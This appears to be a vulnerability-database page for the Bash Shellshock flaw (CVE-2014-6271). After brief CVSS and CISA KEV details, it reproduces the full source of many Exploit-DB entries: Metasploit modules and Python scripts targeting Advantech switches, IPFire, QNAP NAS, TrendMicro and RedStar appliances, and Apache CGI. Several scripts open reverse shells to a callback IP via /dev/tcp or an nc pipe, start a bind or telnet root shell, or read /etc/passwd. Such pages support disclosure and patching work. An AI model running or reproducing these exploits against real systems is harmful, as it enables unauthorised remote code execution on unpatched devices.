Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-78 |
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V3.1 |
9.8 |
CRITICAL |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Base: Exploitabilty MetricsThe Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). Attack Complexity This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability. Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack. User Interaction This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component. The vulnerable system can be exploited without interaction from any user. Base: Scope MetricsThe Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope. Scope Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs. An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority. Base: Impact MetricsThe Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable). Temporal MetricsThe Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability. Environmental MetricsThese metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.
|
[email protected] |
V2 |
10 |
|
AV:N/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
CISA KEV (Known Exploited Vulnerabilities)
Vulnerability name : GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
Required action : Apply updates per vendor instructions.
Known To Be Used in Ransomware Campaigns : Unknown
Added : 2022-01-27 23h00 +00:00
Action is due : 2022-07-27 22h00 +00:00
Important information
This CVE is identified as vulnerable and poses an active threat, according to the Catalog of Known Exploited Vulnerabilities (CISA KEV). The CISA has listed this vulnerability as actively exploited by cybercriminals, emphasizing the importance of taking immediate action to address this flaw. It is imperative to prioritize the update and remediation of this CVE to protect systems against potential cyberattacks.
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 38849
Publication date : 2015-12-01 23h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Advantech Switch Bash Environment Variable Code Injection (Shellshock)',
'Description' => %q{
This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
handles external environment variables. This module targets the 'ping.sh' CGI
script, acessible through the Boa web server on Advantech switches. This module
was tested against firmware version 1322_D1.98.
},
'Author' => 'hdm',
'References' => [
['CVE', '2014-6271'],
['CWE', '94'],
['OSVDB', '112004'],
['EDB', '34765'],
['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities'],
['URL', 'https://access.redhat.com/articles/1200223'],
['URL', 'http://seclists.org/oss-sec/2014/q3/649']
],
'Privileged' => false,
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0A\x0D",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'openssl generic'
}
},
'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]],
'DefaultTarget' => 0,
'License' => MSF_LICENSE,
'DisclosureDate' => 'Dec 01 2015'
))
register_options([
Opt::RPORT(80)
], self.class)
end
#
# CVE-2014-6271
#
def cve_2014_6271(cmd)
%{() { :;}; $(#{cmd}) & }
end
#
# Check credentials
#
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => '/cgi-bin/ping.sh'
)
if !res
vprint_error("#{peer} - No response from host")
return Exploit::CheckCode::Unknown
elsif res.headers['Server'] =~ /Boa\/(.*)/
vprint_status("#{peer} - Found Boa version #{$1}")
else
print_status("#{peer} - Target is not a Boa web server")
return Exploit::CheckCode::Safe
end
if res.body.to_s.index('127.0.0.1 ping statistics')
return Exploit::CheckCode::Detected
else
vprint_error("#{peer} - Target does not appear to be an Advantech switch")
return Expoit::CheckCode::Safe
end
end
#
# Exploit
#
def exploit
cmd = cve_2014_6271(payload.encoded)
vprint_status("#{peer} - Trying to run command '#{cmd}'")
res = send_request_cgi(
'method' => 'GET',
'uri' => '/cgi-bin/ping.sh',
'agent' => cmd
)
end
end
Exploit Database EDB-ID : 34777
Publication date : 2014-09-24 22h00 +00:00
Author : Shaun Colley
EDB Verified : Yes
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'bashedCgi',
'Description' => %q{
Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command.
},
'Author' =>
[
'Stephane Chazelas', # vuln discovery
'Shaun Colley <scolley at ioactive.com>' # metasploit module
],
'License' => MSF_LICENSE,
'References' => [ 'CVE', '2014-6271' ],
'Targets' =>
[
[ 'cgi', {} ]
],
'DefaultTarget' => 0,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true
},
'DefaultOptions' => { 'PAYLOAD' => 0 }
))
register_options(
[
OptString.new('TARGETURI', [true, 'Absolute path of BASH-based CGI', '/']),
OptString.new('CMD', [true, 'Command to execute', '/usr/bin/touch /tmp/metasploit'])
], self.class)
end
def run
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['TARGETURI'],
'agent' => "() { :;}; " + datastore['CMD']
})
if res && res.code == 200
print_good("Command sent - 200 received")
else
print_error("Command sent - non-200 reponse")
end
end
end
Exploit Database EDB-ID : 39918
Publication date : 2016-06-09 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'IPFire Bash Environment Variable Injection (Shellshock)',
'Description' => %q(
IPFire, a free linux based open source firewall distribution,
version <= 2.15 Update Core 82 contains an authenticated remote
command execution vulnerability via shellshock in the request headers.
),
'Author' =>
[
'h00die <
[email protected]>', # module
'Claudio Viviani' # discovery
],
'References' =>
[
[ 'EDB', '34839' ],
[ 'CVE', '2014-6271']
],
'License' => MSF_LICENSE,
'Platform' => %w( linux unix ),
'Privileged' => false,
'DefaultOptions' =>
{
'SSL' => true,
'PAYLOAD' => 'cmd/unix/generic'
},
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic'
}
},
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 29 2014'
)
)
register_options(
[
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', '']),
Opt::RPORT(444)
], self.class
)
end
def check
begin
res = send_request_cgi(
'uri' => '/cgi-bin/index.cgi',
'method' => 'GET'
)
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401
/\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
if version && update && version == "2.15" && update.to_i < 83
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
#
# CVE-2014-6271
#
def cve_2014_6271(cmd)
%{() { :;}; /bin/bash -c "#{cmd}" }
end
def exploit
begin
payload = cve_2014_6271(datastore['CMD'])
vprint_status("Exploiting with payload: #{payload}")
res = send_request_cgi(
'uri' => '/cgi-bin/index.cgi',
'method' => 'GET',
'headers' => { 'VULN' => payload }
)
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401
/<li>Device: \/dev\/(?<output>.+) reports/m =~ res.body
print_good(output) unless output.nil?
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
end
Exploit Database EDB-ID : 34895
Publication date : 2014-10-05 22h00 +00:00
Author : Fady Mohammed Osman
EDB Verified : Yes
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Shellshock Bashed CGI RCE',
'Description' => %q{
This module exploits the shellshock vulnerability in apache cgi. It allows you to
excute any metasploit payload you want.
},
'Author' =>
[
'Stephane Chazelas', # vuln discovery
'Fady Mohamed Osman' # Metasploit module f.othman at zinad.net
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-6271' ]
],
'Payload' =>
{
'BadChars' => "",
},
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 13 2014'))
register_options(
[
OptString.new('TARGETURI', [true, 'The CGI url', '/cgi-bin/test.sh']) ,
OptString.new('FILEPATH', [true, 'The url ', '/tmp'])
], self.class)
end
def exploit
@payload_name = "#{rand_text_alpha(5)}"
full_path = datastore['FILEPATH'] + '/' + @payload_name
payload_exe = generate_payload_exe
if payload_exe.blank?
fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload")
end
peer = "#{rhost}:#{rport}"
print_status("#{peer} - Creating payload #{full_path}")
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['TARGETURI'],
'agent' => "() { :;}; /bin/bash -c \"" + "printf " + "\'" + Rex::Text.hexify(payload_exe).gsub("\n",'') + "\'" + "> #{full_path}; chmod +x #{full_path};#{full_path};rm #{full_path};\""
})
end
end
Exploit Database EDB-ID : 34839
Publication date : 2014-09-30 22h00 +00:00
Author : Claudio Viviani
EDB Verified : Yes
#!/usr/bin/env python
#
# Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.ipfire.org
#
# Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso
#
# Date : 2014-09-29
#
# Fixed version: IPFire 2.15 core 83 (2014-09-28)
#
# Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance.
# It can be maintained via a web interface.
# The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server.
# IPFire is based on Linux From Scratch and is, like the Endian Firewall, originally a fork from IPCop.
#
# Vulnerability: IPFire <= 2.15 core 82 Cgi Web Interface suffers from Authenticated Bash Environment Variable Code Injection
# (CVE-2014-6271)
#
# Suggestion:
#
# If you can't update the distro and you have installed ipfire via image files (Arm, Flash)
# make sure to change the default access permission to graphical user interface (user:admin pass:ipfire)
#
#
# http connection
import urllib2
# Basic Auth management Base64
import base64
# Args management
import optparse
# Error management
import sys
banner = """
___ _______ _______ __ _______ __
| | _ | _ |__.----.-----. | _ .-----|__|
|. |. 1 |. 1___| | _| -__| |. 1___| _ | |
|. |. ____|. __) |__|__| |_____| |. |___|___ |__|
|: |: | |: | |: 1 |_____|
|::.|::.| |::.| |::.. . |
`---`---' `---' `-------'
_______ __ __ __ _______ __ __
| _ | |--.-----| | | _ | |--.-----.----| |--.
| 1___| | -__| | | 1___| | _ | __| <
|____ |__|__|_____|__|__|____ |__|__|_____|____|__|__|
|: 1 | |: 1 |
|::.. . | |::.. . |
`-------' `-------'
IPFire <= 2.15 c0re 82 Authenticated
Cgi Sh3llSh0ck r3m0t3 C0mm4nd Inj3ct10n
Written by:
Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
def connectionScan(url,user,pwd,cmd):
print '[+] Connection in progress...'
try:
response = urllib2.Request(url)
content = urllib2.urlopen(response)
print '[X] IPFire Basic Authentication not found'
except urllib2.HTTPError, e:
if e.code == 404:
print '[X] Page not found'
elif e.code == 401:
try:
print '[+] Authentication in progress...'
base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')
headers = {'VULN' : '() { :;}; echo "H0m3l4b1t"; /bin/bash -c "'+cmd+'"' }
response = urllib2.Request(url, None, headers)
response.add_header("Authorization", "Basic %s" % base64string)
content = urllib2.urlopen(response).read()
if "ipfire" in content:
print '[+] Username & Password: OK'
print '[+] Checking for vulnerability...'
if 'H0m3l4b1t' in content:
print '[!] Command "'+cmd+'": INJECTED!'
else:
print '[X] Not Vulnerable :('
else:
print '[X] No IPFire page found'
except urllib2.HTTPError, e:
if e.code == 401:
print '[X] Wrong username or password'
else:
print '[X] HTTP Error: '+str(e.code)
except urllib2.URLError:
print '[X] Connection Error'
else:
print '[X] HTTP Error: '+str(e.code)
except urllib2.URLError:
print '[X] Connection Error'
commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "touch /tmp/test.txt"')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL",
)
commandList.add_option('-c', '--cmd', action="store",
help="Insert command name",
)
commandList.add_option('-u', '--user', action="store",
help="Insert username",
)
commandList.add_option('-p', '--pwd', action="store",
help="Insert password",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.cmd or not options.user or not options.pwd:
print(banner)
commandList.print_help()
sys.exit(1)
print(banner)
url = checkurl(options.target)
cmd = options.cmd
user = options.user
pwd = options.pwd
connectionScan(url,user,pwd,cmd)
Exploit Database EDB-ID : 36503
Publication date : 2015-03-25 23h00 +00:00
Author : Patrick Pellegrino
EDB Verified : No
# Exploit Title: QNAP admin shell via Bash Environment Variable Code Injection
# Date: 7 February 2015
# Exploit Author: Patrick Pellegrino |
[email protected] [work] /
[email protected] [other]
# Employer homepage: http://www.securegroup.it
# Vendor homepage: http://www.qnap.com
# Version: All Turbo NAS models except TS-100, TS-101, TS-200
# Tested on: TS-1279U-RP
# CVE : 2014-6271
# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/d3vpp/metasploit-modules
##
require 'msf/core'
require 'net/telnet'
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::CommandShell
def initialize(info = {})
super(update_info(info,
'Name' => 'QNAP admin shell via Bash Environment Variable Code Injection',
'Description' => %q{
This module allows you to spawn a remote admin shell (utelnetd) on a QNAP device via Bash Environment Variable Code Injection.
Affected products:
All Turbo NAS models except TS-100, TS-101, TS-200
},
'Author' => ['Patrick Pellegrino'], # Metasploit module |
[email protected] [work] /
[email protected] [other]
'License' => MSF_LICENSE,
'References' => [
['CVE', '2014-6271'], #aka ShellShock
['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']
],
'Platform' => ['unix']
))
register_options([
OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),
OptPort.new('LTELNET', [true, 'Set the remote port where the utelnetd service will be listening','9993'])
], self.class)
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'agent' => "() { :;}; echo; /usr/bin/id"
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
vprint_error("Connection failed")
return Exploit::CheckCode::Unknown
end
if !res
return Exploit::CheckCode::Unknown
elsif res.code== 302 and res.body.include? 'uid'
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit_telnet()
telnetport = datastore['LTELNET']
print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")
print_status("#{rhost}:#{rport} - Sending exploit")
begin
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
if sock
print_good("#{rhost}:#{rport} - Backdoor service spawned")
add_socket(sock)
else
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not spawned")
end
print_status "Starting a Telnet session #{rhost}:#{telnetport}"
merge_me = {
'USERPASS_FILE' => nil,
'USER_FILE' => nil,
'PASS_FILE' => nil,
'USERNAME' => nil,
'PASSWORD' => nil
}
start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
rescue
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not handled")
end
return
end
def run
begin
telnetport = datastore['LTELNET']
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'agent' => "() { :;}; /bin/utelnetd -l/bin/sh -p#{telnetport} &"
})
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
Rex::HostUnreachable => e
fail_with(Failure::Unreachable, e)
ensure
disconnect
end
exploit_telnet()
end
end
Exploit Database EDB-ID : 36504
Publication date : 2015-03-25 23h00 +00:00
Author : Patrick Pellegrino
EDB Verified : No
# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection
# Date: 7 February 2015
# Exploit Author: Patrick Pellegrino |
[email protected] [work] /
[email protected] [other]
# Employer homepage: http://www.securegroup.it
# Vendor homepage: http://www.qnap.com
# Version: All Turbo NAS models except TS-100, TS-101, TS-200
# Tested on: TS-1279U-RP
# CVE : 2014-6271
# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/d3vpp/metasploit-modules
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'QNAP Web server remote code execution via Bash Environment Variable Code Injection',
'Description' => %q{
This module allows you to inject unix command with the same user who runs the http service - admin - directly on the QNAP system.
Affected products:
All Turbo NAS models except TS-100, TS-101, TS-200
},
'Author' => ['Patrick Pellegrino'], # Metasploit module |
[email protected] [work] /
[email protected] [other]
'License' => MSF_LICENSE,
'References' => [
['CVE', '2014-6271'], #aka ShellShock
['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']
],
'Platform' => ['unix']
))
register_options([
OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),
OptString.new('CMD', [ true, 'The command to run', '/bin/cat /etc/passwd'])
], self.class)
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'agent' => "() { :;}; echo; /usr/bin/id"
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
vprint_error("Connection failed")
return Exploit::CheckCode::Unknown
end
if !res
return Exploit::CheckCode::Unknown
elsif res.code== 302 and res.body.include? 'uid'
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def run
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'agent' => "() { :;}; echo; #{datastore['CMD']}"
})
if res.body.empty?
print_error("No data found.")
elsif res.code== 302
print_status("#{rhost}:#{rport} - bash env variable injected")
puts " "
print_line(res.body)
end
end
end
Exploit Database EDB-ID : 40619
Publication date : 2016-10-20 22h00 +00:00
Author : Hacker Fantastic
EDB Verified : No
#!/usr/bin/env python
# TrendMicro InterScan Web Security Virtul Appliance
# ==================================================
# InterScan Web Security is a software virtual appliance that
# dynamically protects against the ever-growing flood of web
# threats at the Internet gateway exclusively designed to secure
# you against traditional and emerging web threats at the Internet
# gateway. The appliance however is shipped with a vulnerable
# version of Bash susceptible to shellshock (I know right?). An
# attacker can exploit this vulnerability by calling the CGI
# shellscript "/cgi-bin/cgiCmdNotify" which can be exploited
# to perform arbitrary code execution. A limitation of this
# vulnerability is that the attacker must have credentials for
# the admin web interface to exploit this flaw. The panel runs
# over HTTP by default so a man-in-the-middle attack could be
# used to gain credentials and compromise the appliance.
#
# $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1
# [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit
# [-] Authenticating to '192.168.56.101' with 'admin' 'password'
# [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA
# [-] exploiting shellshock CVE-2014-6271...
# bash: no job control in this shell
# bash-4.1$ id
# uid=498(iscan) gid=499(iscan) groups=499(iscan)
#
# -- Hacker Fantastic
#
# (https://www.myhackerhouse.com)
import requests
import sys
import os
def spawn_listener():
os.system("nc -l 8080")
def shellshock(ip,session,cbip):
user_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'}
cookies = {'JSESSIONID': session}
print "[-] exploiting shellshock CVE-2014-6271..."
myreq = requests.get("http://"+ip+":1812/cgi-bin/cgiCmdNotify", headers = user_agent, cookies = cookies)
def login_http(ip,user,password):
mydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'}
print "[-] Authenticating to '%s' with '%s' '%s'" % (ip,user,password)
myreq = requests.post("http://"+ip+":1812/uilogonsubmit.jsp", data=mydata)
session_cookie = myreq.history[0].cookies.get('JSESSIONID')
print "[-] JSESSIONID = %s" % session_cookie
return session_cookie
if __name__ == "__main__":
print "[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit"
if len(sys.argv) < 5:
print "[-] use with <ip> <user> <pass> <connectback_ip>"
sys.exit()
newRef=os.fork()
if newRef==0:
spawn_listener()
else:
session = login_http(sys.argv[1],sys.argv[2],sys.argv[3])
shellshock(sys.argv[1],session,sys.argv[4])
Exploit Database EDB-ID : 40938
Publication date : 2016-12-17 23h00 +00:00
Author : Hacker Fantastic
EDB Verified : Yes
#!/usr/bin/env python
# RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit
# ========================================================
# BEAM & RSSMON are Webmin based configuration utilities
# that ship with RSS server 3.0. These packages are the
# recommended GUI configuration components and listen on
# a user specified port from 10000/tcp to 65535/tcp. They
# are accessible on the local host only in vanilla install
# unless the firewall is disabled. Both services run with
# full root permissions and can be exploited for LPE or
# network attacks. RSSMON has hardened SELinux policies
# applied which hinder exploitation of this vulnerability
# be limiting access to network resources. Commands are
# still run as root in a blind way.
#
# $ python rsshellshock.py beam 192.168.0.31 10000 192.168.0.10 8080
# [+] RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit
# [-] exploiting shellshock CVE-2014-6271...
# sh: no job control in this shell
# sh-4.1# id
# uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:beam_t:s0-s15:c0.c1023
# sh-4.1#
#
# -- Hacker Fantastic (https://myhackerhouse.com)
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import subprocess
import requests
import sys
import os
def spawn_shell(cbport):
subprocess.call('nc -l ' + cbport, shell=True)
def shellshock(soft,ip,port,cbip,cbport):
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
if soft == "beam":
user_agent = {'User-agent': '() { :; }; /bin/bash -c "rm /tmp/.f;mkfifo /tmp/.f;cat /tmp/.f|/bin/sh -i 2>&1|nc '+cbip+' '+cbport+' >/tmp/.f"'}
else:
shellstring = '() { :; }; /bin/bash -c "%s"' % (cbip)
user_agent = {'User-agent': shellstring}
print "[-] exploiting shellshock CVE-2014-6271..."
myreq = requests.get("https://"+ip+":"+port+"/session_login.cgi", headers = user_agent, verify=False)
if __name__ == "__main__":
print "[+] RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit"
if len(sys.argv) < 5:
print "[-] Use with <beam> <host> <port> <connectback ip> <connectback port>"
print "[-] Or with <rssmon> <host> <port> <cmd>"
sys.exit()
if(sys.argv[1]=="beam"):
newRef=os.fork()
if newRef==0:
shellshock(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5])
else:
spawn_shell(sys.argv[5])
else:
shellshock(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],0)
Exploit Database EDB-ID : 34900
Publication date : 2014-10-05 22h00 +00:00
Author : Federico Galatolo
EDB Verified : Yes
#!/usr/bin/env python
from socket import *
from threading import Thread
import thread, time, httplib, urllib, sys
stop = False
proxyhost = ""
proxyport = 0
def usage():
print """
Shellshock apache mod_cgi remote exploit
Usage:
./exploit.py var=<value>
Vars:
rhost: victim host
rport: victim port for TCP shell binding
lhost: attacker host for TCP shell reversing
lport: attacker port for TCP shell reversing
pages: specific cgi vulnerable pages (separated by comma)
proxy: host:port proxy
Payloads:
"reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)
"bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport)
Example:
./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234
./exploit.py payload=bind rhost=1.2.3.4 rport=1234
Credits:
Federico Galatolo 2014
"""
sys.exit(0)
def exploit(lhost,lport,rhost,rport,payload,pages):
headers = {"Cookie": payload, "Referer": payload}
for page in pages:
if stop:
return
print "[-] Trying exploit on : "+page
if proxyhost != "":
c = httplib.HTTPConnection(proxyhost,proxyport)
c.request("GET","http://"+rhost+page,headers=headers)
res = c.getresponse()
else:
c = httplib.HTTPConnection(rhost)
c.request("GET",page,headers=headers)
res = c.getresponse()
if res.status == 404:
print "[*] 404 on : "+page
time.sleep(1)
args = {}
for arg in sys.argv[1:]:
ar = arg.split("=")
args[ar[0]] = ar[1]
try:
args['payload']
except:
usage()
if args['payload'] == 'reverse':
try:
lhost = args['lhost']
lport = int(args['lport'])
rhost = args['rhost']
payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &"
except:
usage()
elif args['payload'] == 'bind':
try:
rhost = args['rhost']
rport = args['rport']
payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'"
except:
usage()
else:
print "[*] Unsupported payload"
usage()
try:
pages = args['pages'].split(",")
except:
pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"]
try:
proxyhost,proxyport = args['proxy'].split(":")
except:
pass
if args['payload'] == 'reverse':
serversocket = socket(AF_INET, SOCK_STREAM)
buff = 1024
addr = (lhost, lport)
serversocket.bind(addr)
serversocket.listen(10)
print "[!] Started reverse shell handler"
